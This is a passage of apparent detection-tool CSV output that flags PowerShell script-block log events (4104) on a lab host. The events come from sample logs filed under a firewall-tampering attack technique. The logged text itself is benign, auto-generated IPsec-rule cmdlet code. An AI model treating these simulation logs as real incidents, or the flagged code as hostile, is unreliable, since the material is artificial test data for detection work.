[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) 
$__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 
'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
